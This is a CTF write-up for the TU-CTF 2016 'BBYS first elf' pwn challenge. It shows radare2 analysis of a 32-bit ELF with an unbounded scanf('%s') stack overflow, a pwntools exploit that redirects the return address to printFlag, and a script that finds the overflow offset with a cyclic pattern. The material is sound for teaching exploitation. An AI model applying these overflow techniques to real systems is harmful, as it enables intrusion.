CTF practice: TU-CTF 2016 pwn BBYS-first-elf-25 notes
2016-12-07 10:57
Challenge overview
Far too easy to need much of an overview. Open it in radare2 (I work on Linux; spinning up a Windows VM just for IDA is too much hassle, so I usually don't bother). The mitigations tell you most of what you need: no canary, no PIE, NX on.

[0x080485c9]> iI
havecode  true
pic       false
canary    false
nx        true
crypto    false
va        true
intrp     /lib/ld-linux.so.2
bintype   elf
class     ELF32
lang      c
arch      x86
bits      32
machine   Intel 80386
os        linux
minopsz   1
maxopsz   16
pcalign   0
subsys    linux
endian    little
stripped  false
static    false
linenum   true
lsyms     true
relocs    true
rpath     NONE
binsz     7591
Then look at main: it is just one read and one write. The read is a scanf into a stack buffer. The format string at 0x80486d8 is shown in the listing as the dword 0x44007325, i.e. the bytes 25 73 00, which is "%s" with no width limit, so the bug is obvious: a stack overflow. The buffer lives at esp+0x14 inside a 0x20-byte frame, so only 0xc bytes separate its start from the top of the frame, and anything longer runs into the saved ebp and the return address.
[0x080485c9]> s main
[0x080485c9]> pdf
            ;-- main:
/ (fcn) sym.main 60
|   sym.main ();
|           ; var int local_4h @ esp+0x4
|           ; var int local_14h @ esp+0x14
|           ; JMP XREF from 0x08048487 (entry0)
|           ; DATA XREF from 0x08048487 (entry0)
|           0x080485c9  01:002b  55             push ebp
|           0x080485ca  01:002c  89e5           mov ebp, esp
|           0x080485cc  01:002d  83e4f0         and esp, 0xfffffff0
|           0x080485cf  01:002e  83ec20         sub esp, 0x20
|           0x080485d2  01:002f  c70424ac8604.  mov dword [esp], str.This_program_is_hungry._You_should_feed_it. ; [0x80486ac:4]=0x73696854 LEA str.This_program_is_hungry._You_should_feed_it. ; "This program is hungry. You should feed it." @ 0x80486ac ; const char * s
|           0x080485d9  00:0000  e842feffff     call sym.imp.puts ; int puts(const char *s);
|           0x080485de  01:0030  8d442414       lea eax, dword [esp + local_14h] ; 0x14
|           0x080485e2  01:0031  89442404       mov dword [esp + local_4h], eax
|           0x080485e6  01:0032  c70424d88604.  mov dword [esp], 0x80486d8 ; [0x80486d8:4]=0x44007325 ; const char * format
|           0x080485ed  00:0000  e86efeffff     call sym.imp.__isoc99_scanf ; int scanf(const char *format);
|           0x080485f2  01:0033  c70424db8604.  mov dword [esp], str.Do_you_feel_the_flow_ ; [0x80486db:4]=0x79206f44 LEA str.Do_you_feel_the_flow_ ; "Do you feel the flow?" @ 0x80486db ; const char * s
|           0x080485f9  00:0000  e822feffff     call sym.imp.puts ; int puts(const char *s);
|           0x080485fe  01:0034  b800000000     mov eax, 0
|           0x08048603  01:0035  c9             leave
\           0x08048604  00:0000  c3             ret
Analysis
So how do we exploit it? At first, seeing NX enabled, I assumed ROP would be needed, but this is a 25-point challenge; would ROP really be worth the effort? So I stayed alert and listed the binary's functions with r2's afl:

[0x080485c9]> afl
0x080483b4  3  35       sym._init
0x080483f0  1  6        sym.imp.fflush
0x08048400  1  6        sym.imp.fgets
0x08048410  1  6        sym.imp.fclose
0x08048420  1  6        sym.imp.puts
0x08048430  1  6        loc.imp.__gmon_start__
0x08048440  1  6        sym.imp.__libc_start_main
0x08048450  1  6        sym.imp.fopen
0x08048460  1  6        sym.imp.__isoc99_scanf
0x08048470  1  33 -> 95 entry0
0x080484a0  1  4        sym.__x86.get_pc_thunk.bx
0x080484b0  4  42       sym.deregister_tm_clones
0x080484e0  4  55       sym.register_tm_clones
0x08048520  3  30       sym.__do_global_dtors_aux
0x08048540  4  45 -> 44 sym.frame_dummy
0x0804856d  1  92       sym.printFlag
0x080485c9  1  60       sym.main
0x08048610  4  97       sym.__libc_csu_init
0x08048680  1  2        sym.__libc_csu_fini
0x08048684  1  20       sym._fini
Right, there is a very obvious printFlag at 0x0804856d (the imported fopen/fgets/fclose suggest it simply reads the flag from a file and prints it). Since there is no canary, we overflow the buffer and overwrite main's return address with the address of printFlag. NX is not an obstacle here: it only stops us executing injected shellcode on the stack, and printFlag is existing executable code in .text.

The distance from the buffer to the return address is 0xc bytes of buffer, the padding introduced by and esp, 0xfffffff0 (0, 4, 8 or 12 bytes depending on how the caller left the stack), and the 4-byte saved ebp. A 24-byte filler works on this binary, which means 8 bytes of alignment padding; if the offset does not match on your setup, find it with a cyclic pattern instead of guessing.
Exploit
from pwn import *

# sym.printFlag from the afl listing above
PRINT_FLAG = 0x0804856d

def pwn():
    r = process("./3d726802521a9ce2b24e2c3baf039915e48ad056")
    # 24 bytes cover the 0xc-byte buffer, 8 bytes of alignment padding and
    # the saved ebp; the next 4 bytes land on main's return address
    payload = b"a" * 24 + p32(PRINT_FLAG)
    r.sendline(payload)
    # stdout is a pipe, so everything is flushed when the process exits
    print(r.recvall())

if __name__ == "__main__":
    pwn()
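The 24-byte filler above was found by trial; the following is an added example (my own code, not part of the original writeup) showing the general way to get that number and to check the resulting payload, using only the standard library so it runs without pwntools or the challenge binary. It builds a Metasploit-style cyclic pattern, maps a crashed EIP value back to an offset, and models main's stack frame from the prologue in the disassembly (and esp, 0xfffffff0 / sub esp, 0x20, buffer at esp+0x14). Two things are assumptions: the 8 bytes of alignment padding are inferred from the fact that a 24-byte filler works on this binary, and the frame simulation is a byte-array model, not the real process.

```python
import struct

# Alphabet for a Metasploit-style cyclic pattern ("Aa0Aa1Aa2..."): every
# 4-byte window is unique within the first 20280 bytes, so whatever lands
# in EIP after the crash maps back to exactly one offset into the input.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGIT) * 3   # 20280 bytes


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN)
    pat = bytearray()
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGIT:
                pat += (up + lo + dg).encode()
                if len(pat) >= length:
                    return bytes(pat[:length])
    return bytes(pat[:length])


def pattern_offset(crash_value):
    """Map the 32-bit value found in EIP after the crash back to its offset.
    The value is decoded little-endian, the way an x86 stack stores it."""
    needle = struct.pack("<I", crash_value & 0xFFFFFFFF)
    idx = pattern_create(MAX_PATTERN).find(needle)
    if idx < 0:
        raise ValueError("0x%08x is not part of the pattern" % crash_value)
    return idx


def offset_to_ret(frame_sub, buf_off, align_slack):
    """Distance from the scanf buffer to main's saved return address, from
    the prologue push ebp / mov ebp, esp / and esp, -16 / sub esp, frame_sub.
    buf_off is the buffer's offset from the final esp; align_slack is
    ebp minus the aligned esp (0, 4, 8 or 12, set by the caller's stack
    alignment and only known at run time)."""
    # buffer = aligned_esp - frame_sub + buf_off
    # ret    = ebp + 4 = aligned_esp + align_slack + 4
    return (frame_sub - buf_off) + align_slack + 4


def simulate_overflow(payload, frame_sub=0x20, buf_off=0x14, align_slack=8):
    """Model main's frame as a byte array, copy `payload` into the buffer
    with no length check (what scanf("%s") does), and return the 32-bit
    value now sitting in the return-address slot.  align_slack=8 is an
    assumption derived from the working 24-byte filler on this binary
    (0xc bytes of buffer + 8 bytes of padding + 4 bytes of saved ebp)."""
    ret_off = offset_to_ret(frame_sub, buf_off, align_slack)
    stack = bytearray(ret_off + 4 + 64)   # buffer ... saved ebp, ret, caller's frame
    stack[0:len(payload)] = payload       # unbounded copy, like scanf("%s")
    return struct.unpack_from("<I", stack, ret_off)[0]


def build_payload(offset, target, filler=b"a"):
    """Filler up to the return address, then the target packed little-endian."""
    return filler * offset + struct.pack("<I", target)


PRINT_FLAG = 0x0804856D   # sym.printFlag from the afl listing above


def demo():
    # 1. crash the (simulated) program with a cyclic pattern and read EIP
    crash_eip = simulate_overflow(pattern_create(100))
    # 2. turn the EIP value back into an offset into our input
    off = pattern_offset(crash_eip)
    # 3. build the real payload and confirm the return slot now holds printFlag
    payload = build_payload(off, PRINT_FLAG)
    return off, payload, simulate_overflow(payload)


if __name__ == "__main__":
    off, payload, ret = demo()
    print("offset to return address:", off)
    print("payload:", payload)
    print("return address after overflow: 0x%08x" % ret)
```

Against the real binary the same two steps apply: send pattern_create(100), read EIP from the crash (gdb or the core file), feed it to pattern_offset, and only then build the payload; that replaces guessing the alignment padding with a measurement.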